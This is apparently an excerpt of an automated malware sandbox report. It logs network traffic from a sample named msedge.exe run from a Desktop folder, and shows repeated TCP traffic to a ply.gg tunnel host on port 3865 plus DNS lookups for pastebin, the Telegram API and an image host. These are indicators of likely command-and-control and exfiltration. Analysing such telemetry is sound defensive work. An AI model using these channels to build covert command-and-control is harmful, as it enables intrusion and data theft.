Dec 2, 2024 18:47:33.212755919 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:33.481543064 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:33.601449966 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:33.601494074 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:33.721501112 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:33.721553087 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:33.841440916 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:33.972501993 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:34.092698097 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:34.173428059 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:34.293657064 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:34.440118074 CET	443	49989	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:34.440351009 CET	49989	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:34.444077969 CET	49989	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:34.444092035 CET	443	49989	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:34.444350958 CET	443	49989	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:34.449086905 CET	49989	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:34.449140072 CET	443	49989	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:34.449265957 CET	443	49989	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:34.449296951 CET	49989	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:34.449423075 CET	49989	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:34.923861980 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:35.043946981 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:35.378741026 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:35.498797894 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:35.498919010 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:35.618899107 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:35.618963003 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:35.738974094 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:35.739029884 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:35.801551104 CET	49998	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:35.801610947 CET	443	49998	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:35.801685095 CET	49998	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:35.802166939 CET	49998	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:35.802184105 CET	443	49998	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:35.863459110 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:35.863516092 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:35.984066010 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:35.984133959 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:36.107264042 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:36.107326031 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:36.227440119 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:37.274262905 CET	443	49998	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:37.274415970 CET	49998	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:37.325123072 CET	49998	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:37.325150967 CET	443	49998	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:37.325484991 CET	443	49998	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:37.348654032 CET	49998	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:37.348720074 CET	443	49998	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:37.348777056 CET	49998	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:37.657107115 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:37.657174110 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:38.596592903 CET	50005	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:38.596652031 CET	443	50005	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:38.596739054 CET	50005	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:38.600087881 CET	50005	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:38.600116014 CET	443	50005	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:40.021334887 CET	443	50005	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:40.021411896 CET	50005	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:40.024816990 CET	50005	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:40.024840117 CET	443	50005	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:40.025070906 CET	443	50005	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:40.026879072 CET	50005	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:40.026932001 CET	443	50005	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:40.026984930 CET	50005	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:41.190926075 CET	50012	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:41.190968037 CET	443	50012	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:41.191123962 CET	50012	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:41.191411972 CET	50012	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:41.191422939 CET	443	50012	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:42.048759937 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:42.052676916 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:42.168853998 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:42.173017025 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:42.173094988 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:42.191198111 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:42.312618971 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:42.566448927 CET	443	50012	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:42.566587925 CET	50012	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:42.568380117 CET	50012	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:42.568387985 CET	443	50012	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:42.568635941 CET	443	50012	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:42.570048094 CET	50012	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:42.570081949 CET	443	50012	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:42.570188999 CET	443	50012	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:42.570235014 CET	50012	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:42.570383072 CET	50012	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:43.667021990 CET	50019	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:43.667064905 CET	443	50019	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:43.667300940 CET	50019	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:43.670156002 CET	50019	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:43.670171976 CET	443	50019	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:43.839737892 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:43.960557938 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:43.960623980 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:44.081681013 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:44.081748009 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:44.203075886 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:45.090471029 CET	443	50019	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:45.092180014 CET	50019	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:45.092180014 CET	50019	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:45.092216015 CET	443	50019	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:45.092449903 CET	443	50019	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:45.104085922 CET	50019	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:45.104126930 CET	443	50019	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:45.104223013 CET	443	50019	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:45.108165026 CET	50019	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:45.108165026 CET	50019	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:46.170891047 CET	50025	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:46.170944929 CET	443	50025	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:46.171027899 CET	50025	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:46.205379963 CET	50025	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:46.205405951 CET	443	50025	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:47.532438993 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:47.572793961 CET	443	50025	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:47.572869062 CET	50025	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:47.575319052 CET	50025	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:47.575326920 CET	443	50025	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:47.575552940 CET	443	50025	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:47.577332973 CET	50025	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:47.577359915 CET	443	50025	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:47.577404022 CET	50025	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:47.652507067 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:47.652565002 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:47.773783922 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:47.773864985 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:47.894145012 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:48.202738047 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:48.323000908 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:48.519042015 CET	50031	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:48.519114017 CET	443	50031	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:48.523644924 CET	50031	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:48.526108027 CET	50031	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:48.526124001 CET	443	50031	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:49.886977911 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:49.949490070 CET	443	50031	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:49.949574947 CET	50031	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:49.951858997 CET	50031	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:49.951869965 CET	443	50031	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:49.952097893 CET	443	50031	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:49.953798056 CET	50031	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:49.953830957 CET	443	50031	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:49.953886032 CET	50031	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:50.008982897 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:50.009049892 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:50.130227089 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:50.130312920 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:50.255683899 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:50.255834103 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:50.381279945 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:50.832242012 CET	50037	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:50.832289934 CET	443	50037	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:50.832743883 CET	50037	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:50.832885027 CET	50037	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:50.832895994 CET	443	50037	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:51.234266996 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:51.355375051 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:51.355429888 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:51.475573063 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:51.647989988 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:51.768248081 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:51.768313885 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:51.888288021 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:52.219177008 CET	443	50037	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:52.219403028 CET	50037	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:52.227180004 CET	50037	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:52.227191925 CET	443	50037	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:52.227417946 CET	443	50037	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:52.231307983 CET	50037	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:52.231343031 CET	443	50037	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:52.231401920 CET	50037	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:53.049770117 CET	50043	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:53.049827099 CET	443	50043	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:53.050184011 CET	50043	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:53.050617933 CET	50043	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:53.050632954 CET	443	50043	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:53.850045919 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:53.970181942 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:54.071651936 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:54.191777945 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:54.522470951 CET	443	50043	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:54.522604942 CET	50043	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:54.524252892 CET	50043	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:54.524262905 CET	443	50043	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:54.524499893 CET	443	50043	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:54.532130003 CET	50043	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:54.532195091 CET	443	50043	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:54.532322884 CET	443	50043	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:54.532397032 CET	50043	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:54.532397032 CET	50043	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:55.262355089 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:55.300631046 CET	50049	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:55.300678015 CET	443	50049	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:55.300777912 CET	50049	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:55.301081896 CET	50049	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:55.301091909 CET	443	50049	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:55.382514000 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:55.382569075 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:55.502726078 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:55.502773046 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:55.623317957 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:55.740703106 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:55.861023903 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:55.910635948 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:56.031919003 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:56.031980991 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:56.152594090 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:56.784363031 CET	443	50049	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:56.784508944 CET	50049	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:56.786046982 CET	50049	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:56.786060095 CET	443	50049	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:56.786324024 CET	443	50049	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:56.787550926 CET	50049	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:56.787590027 CET	443	50049	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:56.787727118 CET	443	50049	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:56.787822962 CET	50049	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:56.787822962 CET	50049	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:57.280962944 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:57.401405096 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:57.401465893 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:57.503133059 CET	50054	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:57.503171921 CET	443	50054	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:57.503226042 CET	50054	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:57.503568888 CET	50054	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:57.503582001 CET	443	50054	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:57.521488905 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:57.521538973 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:57.641714096 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:57.766145945 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:57.886235952 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:57.886291981 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:58.008799076 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:58.042591095 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:58.162738085 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:58.162796021 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:58.284607887 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:58.925553083 CET	443	50054	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:58.925708055 CET	50054	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:58.927366018 CET	50054	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:58.927376986 CET	443	50054	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:58.927620888 CET	443	50054	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:58.929032087 CET	50054	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:58.929074049 CET	443	50054	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:58.929209948 CET	443	50054	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:58.929286957 CET	50054	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:58.929286957 CET	50054	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:59.248399019 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:59.368953943 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:59.438436985 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:59.559942007 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:59.560074091 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:59.596997023 CET	50059	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:59.597042084 CET	443	50059	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:59.597107887 CET	50059	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:59.597383022 CET	50059	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:59.597394943 CET	443	50059	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:59.680041075 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:59.680094004 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:48:00.007287025 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:48:00.007360935 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:48:00.127423048 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:48:01.229001999 CET	443	50059	91.134.9.160	192.168.2.4
Dec 2, 2024 18:48:01.229721069 CET	50059	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:01.241579056 CET	50059	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:01.241600990 CET	443	50059	91.134.9.160	192.168.2.4
Dec 2, 2024 18:48:01.241956949 CET	443	50059	91.134.9.160	192.168.2.4
Dec 2, 2024 18:48:01.269819975 CET	50059	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:01.269898891 CET	443	50059	91.134.9.160	192.168.2.4
Dec 2, 2024 18:48:01.269956112 CET	50059	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:01.746680021 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:48:01.866724014 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:48:01.866808891 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:48:01.909432888 CET	50062	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:01.909476995 CET	443	50062	91.134.9.160	192.168.2.4
Dec 2, 2024 18:48:01.909540892 CET	50062	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:01.909925938 CET	50062	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:01.909936905 CET	443	50062	91.134.9.160	192.168.2.4
Dec 2, 2024 18:48:01.987277031 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:48:01.987337112 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:48:02.107439995 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:48:02.107503891 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:48:02.228977919 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:48:03.376488924 CET	443	50062	91.134.9.160	192.168.2.4
Dec 2, 2024 18:48:03.376620054 CET	50062	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:03.633846045 CET	50062	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:03.633892059 CET	443	50062	91.134.9.160	192.168.2.4
Dec 2, 2024 18:48:03.634226084 CET	443	50062	91.134.9.160	192.168.2.4
Dec 2, 2024 18:48:03.635514975 CET	50062	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:03.635555983 CET	443	50062	91.134.9.160	192.168.2.4
Dec 2, 2024 18:48:03.635701895 CET	443	50062	91.134.9.160	192.168.2.4
Dec 2, 2024 18:48:03.635701895 CET	50062	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:03.635785103 CET	50062	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:48:04.121473074 CET	3865	50013	147.185.221.24	192.168.2.4
Dec 2, 2024 18:48:04.124191999 CET	50013	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:48:05.215029001 CET	50013	3865	192.168.2.4	147.185.221.24

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 18:45:00.144412041 CET	52543	53	192.168.2.4	1.1.1.1
Dec 2, 2024 18:45:00.284198046 CET	53	52543	1.1.1.1	192.168.2.4
Dec 2, 2024 18:45:03.077164888 CET	60096	53	192.168.2.4	1.1.1.1
Dec 2, 2024 18:45:03.216547012 CET	53	60096	1.1.1.1	192.168.2.4
Dec 2, 2024 18:45:08.759732962 CET	50228	53	192.168.2.4	1.1.1.1
Dec 2, 2024 18:45:09.487962961 CET	53	50228	1.1.1.1	192.168.2.4
Dec 2, 2024 18:45:10.455332041 CET	59161	53	192.168.2.4	1.1.1.1
Dec 2, 2024 18:45:11.077008009 CET	53	59161	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 2, 2024 18:45:00.144412041 CET	192.168.2.4	1.1.1.1	0xd921	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:03.077164888 CET	192.168.2.4	1.1.1.1	0xa994	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:08.759732962 CET	192.168.2.4	1.1.1.1	0x4a3b	Standard query (0)	upon-forming.gl.at.ply.gg	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:10.455332041 CET	192.168.2.4	1.1.1.1	0x62d	Standard query (0)	i.ibb.co	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 2, 2024 18:45:00.284198046 CET	1.1.1.1	192.168.2.4	0xd921	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:00.284198046 CET	1.1.1.1	192.168.2.4	0xd921	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:00.284198046 CET	1.1.1.1	192.168.2.4	0xd921	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:03.216547012 CET	1.1.1.1	192.168.2.4	0xa994	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:09.487962961 CET	1.1.1.1	192.168.2.4	0x4a3b	No error (0)	upon-forming.gl.at.ply.gg	147.185.221.24	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:11.077008009 CET	1.1.1.1	192.168.2.4	0x62d	No error (0)	i.ibb.co	91.134.9.160	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:11.077008009 CET	1.1.1.1	192.168.2.4	0x62d	No error (0)	i.ibb.co	91.134.10.127	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:11.077008009 CET	1.1.1.1	192.168.2.4	0x62d	No error (0)	i.ibb.co	91.134.10.182	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:11.077008009 CET	1.1.1.1	192.168.2.4	0x62d	No error (0)	i.ibb.co	91.134.10.168	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:11.077008009 CET	1.1.1.1	192.168.2.4	0x62d	No error (0)	i.ibb.co	91.134.82.79	A (IP address)	IN (0x0001)	false
Dec 2, 2024 18:45:11.077008009 CET	1.1.1.1	192.168.2.4	0x62d	No error (0)	i.ibb.co	91.134.9.159	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

api.telegram.org

i.ibb.co

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.20.3.235	443	6924	C:\Users\user\Desktop\msedge.exe

